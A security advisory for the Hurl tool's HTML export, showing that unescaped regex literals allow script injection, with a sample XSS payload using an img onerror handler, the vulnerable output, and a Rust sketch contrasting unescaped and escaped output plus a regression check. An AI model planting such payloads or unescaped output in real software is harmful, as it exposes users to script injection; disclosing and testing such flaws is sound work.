Headline
GHSA-v33j-v3x4-42qg: Regex literals in Hurl files are not escaped when exported to HTML, allowing injections
Given this Hurl file:
regex.hurl:
GET https://foo.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/
When exported to HTML:
$ hurlfmt --out html regex.hurl
<pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span>
</span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span>
<span class="line"><span class="section-header">[Asserts]</span></span>
<span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
</span></span><span class="line"></span>
</code></pre>
The regex literal /<img src="" onerror="alert('Hi!')">/ is not escaped:
<span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
When opened in a browser, the code is run without user interaction.
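The following Rust sketch is an added example, not hurlfmt's own code: it puts the unescaped span construction shown above next to an escaped one, and adds a regression check that flags any tag in the exported fragment other than `span`, `pre` and `code`. All function names are hypothetical.

```rust
/// Hypothetical helper: escape characters that are significant in HTML
/// text and attribute values.
fn escape_html(text: &str) -> String {
    let mut out = String::with_capacity(text.len());
    for c in text.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#x27;"),
            _ => out.push(c),
        }
    }
    out
}

/// Behaviour shown in the advisory: the regex source is copied verbatim.
fn regex_span_unescaped(source: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", source)
}

/// Hardened form: the regex source is escaped before it is wrapped.
fn regex_span_escaped(source: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", escape_html(source))
}

/// Regression check: list every tag in `html` other than the ones the
/// exported fragment above is built from (span, pre, code).
fn unexpected_tags(html: &str) -> Vec<String> {
    let allowed = ["span", "pre", "code"];
    let mut found = Vec::new();
    let mut rest = html;
    while let Some(pos) = rest.find('<') {
        rest = &rest[pos + 1..];
        let name: String = rest.trim_start_matches('/').chars()
            .take_while(|c| c.is_ascii_alphanumeric()).collect();
        let name = name.to_ascii_lowercase();
        if !name.is_empty() && !allowed.contains(&name.as_str()) {
            found.push(name);
        }
    }
    found
}

fn main() {
    let source = r#"<img src="" onerror="alert('Hi!')">"#;
    println!("{:?}", unexpected_tags(&regex_span_unescaped(source)));
    println!("{:?}", unexpected_tags(&regex_span_escaped(source)));
}
```

Run against the regex source from `regex.hurl`, the check reports `img` for the unescaped span and nothing for the escaped one.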
References
- GHSA-v33j-v3x4-42qg
- Orange-OpenSource/hurl@248ac41
- Orange-OpenSource/hurl@7dcdbd1